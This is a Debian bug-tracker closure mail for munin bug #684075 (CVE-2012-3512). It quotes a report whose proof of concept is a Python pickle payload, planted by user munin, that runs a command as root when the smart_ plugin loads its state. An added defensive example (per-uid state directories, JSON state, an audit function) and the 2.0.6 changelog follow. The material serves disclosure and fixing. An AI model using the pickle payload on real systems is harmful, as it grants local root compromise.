Your message dated Mon, 03 Sep 2012 13:17:47 +0000
with message-id <e1t8wxd-0006dc...@franck.debian.org>
and subject line Bug#684075: fixed in munin 2.0.6-1
has caused the Debian Bug report #684075,
regarding munin: insecure state file handling, munin->root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
684075: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684075
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: munin-plugins-core
Version: 1.4.5-3
Severity: grave
Tags: upstream security
X-Debbugs-CC: hel...@subdivi.de

Hello, copying kenyon's report from
http://www.munin-monitoring.org/ticket/1234 :
Currently, plugins which run as root mix their state files in the same
directory as non-root plugins. The state directory is owned by
munin:munin and is group-writable. Because of these facts, it is
possible for an attacker who operates as user munin to cause a
root-run plugin to run arbitrary code as root.

A proof-of-concept example is the smart_ plugin. It must run as root
to access disk SMART data. It also stores state in Python pickle
format, which can store executable Python code. Example follows:
# su -s /bin/sh -c /bin/sh munin
$ cd /var/lib/munin/plugin-state
$ mv smart-sda.state smart-sda.state.orig
$ cat bla.py
import pickle
import subprocess
import sys

class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh', '-c', 'id > /tmp/whoami'),))

pickle.dump(RunBinSh(), sys.stdout)
$ python bla.py > smart-sda.state
# wait for node to run smart_ plugin
$ cat /tmp/whoami
uid=0(root) gid=110(munin) groups=0(root),110(munin)
A possible solution is to have a directory dedicated to each plugin,
especially plugins which may run with superuser privileges, so that
less-privileged users cannot modify their state files. This cannot be
enforced by munin on all plugins, but this can be enforced by munin
developers for plugins shipped with the munin package. We should
consider making it easy for plugin writers to do this, maybe by making
the perl/bourne shell/other language munin plugin API use a dedicated
plugin state directory for each plugin. Otherwise, a plugin could be
hardcoded to create and use a subdirectory of the existing
plugin-state directory.

Thanks to "cnu" on the munin IRC channel for raising this issue and
providing the smart_ example.

--- End Message ---
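Added example (editor's code, not munin's, kenyon's or Debian's): a small plugin state store built on the two changes the report above asks for and that the 2.0.6 changelog later describes, namely one private subdirectory per plugin uid under a root-owned state root, and a data-only serialisation (JSON) in place of pickle. It also includes an audit function for the legacy shared layout that reports which state files a non-owner could swap out. Every name in it (check_state_dir, plugin_state_dir, save_state, load_state, tamperable_files, demo) is this example's own, and the directory names it creates are temporary stand-ins for /var/lib/munin/plugin-state; it assumes a POSIX system with os.O_NOFOLLOW.

```python
import json
import os
import stat
import tempfile

# Added example, not munin's own code. It models the layout the 2.0.6
# changelog describes (a root-owned state root with one subdirectory per
# plugin uid) and replaces pickle with JSON for the state file itself.
# All function and exception names below are this example's own.


class UnsafeStateDir(Exception):
    """The state directory or file could be modified by a user other than its owner."""


class CorruptState(Exception):
    """The state file is not the JSON document this plugin wrote."""


def check_state_dir(path, expected_uid):
    """Refuse a state directory another user could write to or replace."""
    st = os.lstat(path)
    if not stat.S_ISDIR(st.st_mode):
        raise UnsafeStateDir("%s is not a real directory" % path)
    if st.st_uid != expected_uid:
        raise UnsafeStateDir("%s owned by uid %d, expected %d"
                             % (path, st.st_uid, expected_uid))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafeStateDir("%s is group- or world-writable" % path)
    return True


def plugin_state_dir(root, uid=None):
    """Return <root>/<uid>, created 0700 and verified before use."""
    uid = os.getuid() if uid is None else uid
    path = os.path.join(root, str(uid))
    os.makedirs(path, mode=0o700, exist_ok=True)
    os.chmod(path, 0o700)          # makedirs is subject to umask; be explicit
    check_state_dir(path, uid)
    return path


def save_state(state_dir, name, data):
    """Write plain data as JSON, mode 0600, refusing to follow a symlink."""
    path = os.path.join(state_dir, name)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW
    with os.fdopen(os.open(path, flags, 0o600), "w") as f:
        json.dump(data, f)
    return path


def load_state(state_dir, name, default=None):
    """Read state back with json; unlike pickle, json cannot instantiate objects."""
    path = os.path.join(state_dir, name)
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except FileNotFoundError:
        return default
    with os.fdopen(fd, "r") as f:
        st = os.fstat(f.fileno())  # check the file we actually opened
        if st.st_uid != os.getuid() or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise UnsafeStateDir("%s is not a private file of uid %d"
                                 % (path, os.getuid()))
        try:
            return json.load(f)
        except ValueError as exc:
            raise CorruptState("%s: %s" % (path, exc))


def tamperable_files(shared_dir):
    """Audit a legacy shared state directory (the pre-2.0.6 layout).

    Returns the names of files that a user other than the file owner could
    replace or edit: any file in a group/world-writable directory can be
    renamed away and substituted, and a group/world-writable file can be
    edited in place.
    """
    dir_st = os.lstat(shared_dir)
    dir_open = bool(dir_st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    found = []
    for name in sorted(os.listdir(shared_dir)):
        st = os.lstat(os.path.join(shared_dir, name))
        if dir_open or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            found.append(name)
    return found


def demo():
    """Old shared layout versus per-uid layout, on constructed temp directories."""
    legacy = tempfile.mkdtemp()
    os.chmod(legacy, 0o770)                      # like munin:munin, group-writable
    with open(os.path.join(legacy, "smart-sda.state"), "w") as f:
        f.write("{}")
    flagged = tamperable_files(legacy)

    root = tempfile.mkdtemp()                    # stands in for the uid-0-owned root
    mine = plugin_state_dir(root)
    save_state(mine, "smart-sda.state", {"last_temp": 41})
    reloaded = load_state(mine, "smart-sda.state")
    return flagged, reloaded


if __name__ == "__main__":
    print(demo())
```

The audit deliberately flags every file in a group-writable directory, not only group-writable files: in the report above the attacker never edits smart-sda.state in place, they rename it and drop a replacement, which directory write permission alone allows. The loader checks ownership and mode on the descriptor it opened (fstat, O_NOFOLLOW) rather than on the path, so a file swapped between check and open is still caught.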
--- Begin Message ---
Source: munin
Source-Version: 2.0.6-1

We believe that the bug you reported is fixed in the latest version of
munin, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 684...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Holger Levsen <hol...@debian.org> (supplier of updated munin package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 03 Sep 2012 12:42:09 +0000
Source: munin
Binary: munin-node munin-plugins-core munin-plugins-extra munin-plugins-java 
munin munin-common munin-async munin-doc
Architecture: source all
Version: 2.0.6-1
Distribution: unstable
Urgency: high
Maintainer: Munin Debian Maintainers <packag...@munin-monitoring.org>
Changed-By: Holger Levsen <hol...@debian.org>
Description: 
 munin      - network-wide graphing framework (grapher/gatherer)
 munin-async - network-wide graphing framework (async master/client)
 munin-common - network-wide graphing framework (common)
 munin-doc  - network-wide graphing framework (documentation)
 munin-node - network-wide graphing framework (node)
 munin-plugins-core - network-wide graphing framework (plugins for node)
 munin-plugins-extra - network-wide graphing framework (user contributed 
plugins for nod
 munin-plugins-java - network-wide graphing framework (java plugins for node)
Closes: 679897 684075 684076 685343 686089 686090 686093
Changes: 
 munin (2.0.6-1) unstable; urgency=high
 .
   * New upstream release 2.0.6, switching back to cron graphing (as it is better
     for small setups) and besides that only containing bugfixes, but many of
     them. See the upstream ChangeLog for the full list.
     - munin-node: more secure state file handling, introducing a new plugin
       state directory root, owned by uid 0. Then each plugin runs in its own
       UID plugin state directory, owned by the said UID. (Closes: #684075),
       (Closes: #679897), closes CVE-2012-3512.
       So all properly written plugins will use
       /var/lib/munin-node/plugin-state/$uid/$some_file now - please report
       plugins that are still using /var/lib/munin/plugin-state/ - as those
       might pose a security risk!
     - munin-cgi-graph: ignore @ARGV to fix CVE-2012-3513 (Closes: #684076),
       thanks to Helmut Grohne <hel...@subdivi.de>
     - munin-cron: call munin-graph with --cron argument (Closes: #685343)
     - Master/Node.pm: fix _node_read_fast() to accept all valid returns
       (Closes: #686089) and _do_connect() to not use an uninitialized
       variable. (Closes: #686090)
     - munin-async: make spoolread less restrictive about (valid) plugin names
       (Closes: #686093)
   * Update Location and Scriptalias in shipped apache.conf to fix a regression
     introduced in fixing #682869.
   * munin-node.postinst: don't create /var/lib/munin/plugin-state anymore as
     munin-node now uses /var/lib/munin-nodes/plugin-state and subdirs and
     handles creation by itself.
   * debian/rules: workaround bug in upstream Makefile targets to move
     /var/lib/async from munin-node package to munin-async.
   * debian/control:
     - make munin-async depend on munin-node for now.
     - update Vcs: headers to point to an up-to-date repository.
   * Remove build/resources/apache-cgi.conf from munin.docs as it's outdated.
   * update munin.NEWS to reflect that everybody using cgi graphing needs to
     update the configuration files and that cron graphing is the default
     again. (cgi graphing was the default from pre-2.0 until 2.0.5)
Checksums-Sha1: 
 f74026d9184cce248e5161f2988658d05ce49e9c 2362 munin_2.0.6-1.dsc
 639bd5b9fe457326842ed425f5258ea29db0b853 1325754 munin_2.0.6.orig.tar.gz
 7e27351c09fbbd9d5e965a533c10764939cf3917 51051 munin_2.0.6-1.diff.gz
 7fd31a561466dca631337321d05845af0f75714a 127752 munin-node_2.0.6-1_all.deb
 53cb5953732a2346c295cdceca97e5edabda19ae 304194 
munin-plugins-core_2.0.6-1_all.deb
 2e4d133a910fa252dab2391305437b3752cc37e8 154006 
munin-plugins-extra_2.0.6-1_all.deb
 3eec5502fcf9e64b84c9edf98613221ff694fcd8 146912 
munin-plugins-java_2.0.6-1_all.deb
 23d76f087fb00cc666455a72bdf015fad9f21c74 201718 munin_2.0.6-1_all.deb
 0a815552c09f7b182f3b124f6f8a465163ca5ed8 94732 munin-common_2.0.6-1_all.deb
 bffcde93d5c686fcf8de91581c734d32f8b09022 82804 munin-async_2.0.6-1_all.deb
 3619315c94a405d54ac822262cb905bbf8b05f8c 211516 munin-doc_2.0.6-1_all.deb
Checksums-Sha256: 
 3470e54e99e0a16e607c7f6f3812756a643008e2de91b9e2f1b695d06eab944a 2362 
munin_2.0.6-1.dsc
 ff99a3c36156adb6b867bb684ec508a857728336c0b81a93955bbcc9d5045ea6 1325754 
munin_2.0.6.orig.tar.gz
 559090dec1df4d5c4d8592f630a8e827f0eacc54756aaf060ef11af4cc2c1d06 51051 
munin_2.0.6-1.diff.gz
 fdaafe38f6e05e966063f933696e1ebf87c75caec8efeddde71630584906fca4 127752 
munin-node_2.0.6-1_all.deb
 7f780cdd706b61119758281031ac16d6e9a17fc153673be8b6d47857d2067605 304194 
munin-plugins-core_2.0.6-1_all.deb
 a45aee6a32389731dcfa45cccd1926560518b02419b3c40fd9d989736fa86b5f 154006 
munin-plugins-extra_2.0.6-1_all.deb
 b39a4c341fd99c9be476dee153e9a9110e8a4aa8ae178da5bf657ca33f9415da 146912 
munin-plugins-java_2.0.6-1_all.deb
 ba5fe591b6a98fad66cc24ba99eba58c2b71377a2c04fbad3be7e5fd5433a583 201718 
munin_2.0.6-1_all.deb
 fa755d6f651834adf9e91d62b960662f832b08fd44e2a1d305af694408398859 94732 
munin-common_2.0.6-1_all.deb
 2cb41fd22e9800e0667b2c1af516ae6e96e885cfdf28a6c3ef90cfea5c7edf3e 82804 
munin-async_2.0.6-1_all.deb
 c7006f900b4bacff7ade589600b3ade71c4cbb4c9ed2774fe1f9189d94cf7465 211516 
munin-doc_2.0.6-1_all.deb
Files: 
 1e9514ba9330de5e78d22c474b06d0af 2362 net optional munin_2.0.6-1.dsc
 a64e7d3d7a7736f3959092145886ce88 1325754 net optional munin_2.0.6.orig.tar.gz
 32e91dc8f2aae9ca27f4924ca1013755 51051 net optional munin_2.0.6-1.diff.gz
 2bff976ceb3624407b8d8b2250a44873 127752 net optional munin-node_2.0.6-1_all.deb
 ed4d325236237233008ffd4e32e80a45 304194 net optional 
munin-plugins-core_2.0.6-1_all.deb
 7d7a088725e012d8a2e89bb654e6fea8 154006 net optional 
munin-plugins-extra_2.0.6-1_all.deb
 2c2d8496a8ecc114dfd5b6b6926c2a28 146912 net optional 
munin-plugins-java_2.0.6-1_all.deb
 334c9918acd98ad610f2f6b9ff3d1072 201718 net optional munin_2.0.6-1_all.deb
 81bfc537f8fd914a1f7cc84e1673ea50 94732 net optional 
munin-common_2.0.6-1_all.deb
 301cd30114b0202d5af147cfc9e37148 82804 net optional munin-async_2.0.6-1_all.deb
 22b455e1b14aa3d50cb9181fd0b1d9af 211516 doc optional munin-doc_2.0.6-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQIVAwUBUESqGwkauFYGmqocAQgkpQ//XIlizdF6mCQwt+a4Yv6EKSU4GZmw3Wj8
vZgXYp2Zo5r4lnsd9huSgBoUudzX+1b6NiyhKZh4cMUEIXRqD6ObbVWgFKzrXrTj
7zKh/MeFDYnhx71JPbHh+SsWfXC8aNTpU6zkE9GPgWOZP5RBYjpcyf7qQJMApclg
MRUzUEaX4fcXEZMEkZI+KjuZQQej55Zwq+iRfCHYyMoslVO6eyEmiFPw33pKIf2R
8u4xseoUxmUinvD1GIEn2OfSoZiOzionEnFLXm9XSuDdDv5D3EYTF2y7XYQZu7l2
Wd48aU0KJRpNtNV2XiW/7EAXu+dE5zl5+364Qb+tYcQaaerYvF0RJWXqOLxC49w0
OZaTB9MJ4om9bCAh5jLxrejSLjVMqvCc5ntaRudqgY+dWJoDuzTs0HlwFlavq6D0
vxYw2Wvo52SxVrpWXpROHNOo0ivb1y6t4yqOC7SYpOOnLRXQ4ipK0AkSdx1z23FD
FH/l8vrqOHNj78n6xiLqXm8jlufKYD8KpP9O3UkttQQ6cS2k10jFHN5PskiH32NR
CH3L9S16x4nODYPO/L15Rutn/ihdeKm8nQcqTPMTKRi/3wEfi4UYDvpRM7bofs3h
5w70JYhQiRH18Jw0bhXmbK0qYo8m5S1OafYQbjO63/RcFcwBs2tzpu46ulnFczOW
0YDtt+72KHo=
=PJjc
-----END PGP SIGNATURE-----

--- End Message ---